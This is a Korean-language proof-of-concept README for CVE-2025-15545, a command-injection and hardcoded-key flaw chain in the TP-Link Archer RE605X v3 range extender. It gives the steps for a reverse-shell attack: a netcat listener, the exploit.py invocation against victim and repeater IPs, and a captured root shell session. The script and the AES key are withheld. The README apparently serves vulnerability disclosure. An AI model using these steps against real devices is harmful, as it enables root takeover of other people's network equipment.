
CVE-2025-15545 개념 증명
공급업체: TP-Link
공급업체 웹사이트: TP-Link
모델: Archer RE605X
하드웨어 버전: RE605X v3.0
펌웨어 버전: RE605X(EU)_V3_1.1.5 Build 20240905
펌웨어 다운로드 주소: TP-Link
하드코딩된 암호화 키 사용 및 XML 구성 파서 구성 요소의 명령 주입을 포함한 일련의 취약점으로 인해 로컬 인증 공격자가 장치에서 루트 권한으로 원격 코드 실행(RCE)을 달성할 수 있습니다.
참고: exploit.py 개념 증명은 연결된 공격 시나리오를 보여주며, 추가 전제 조건으로 인증된 사용자의 자격 증명에 의존합니다. 이 인증 단계는 CVE-2025-15545에 포함되지 않으며 데모 목적으로만 포함됩니다.
별도의 터미널에서 들어오는 연결을 수신하세요:
$ nc -lvnp 4444
exploit.py 스크립트를 실행하세요:
$ sudo python3 exploit.py <interface> <victim_ip> <repeater_ip> <aes_key> <aes_iv>
참고: aes_key와 aes_iv는 장치가 구성 파일 암호화 및 복호화에 사용하는 하드코딩된 암호화 키이며, 이 개념 증명에 필요합니다. 보안 문제로 인해 여기서 공유할 수 없습니다.
첫 번째 터미널에서 리버스 셸을 수신합니다:
$ nc -lvnp 4444
Connection from 192.168.0.254:42762
# ls
cgi-bin
index-notice.html
index-url.html
index.html
webpages
# id -un
root
# uname -n
OpenWrt
이 취약점들은 Nicola Giuffrida가 보고했습니다.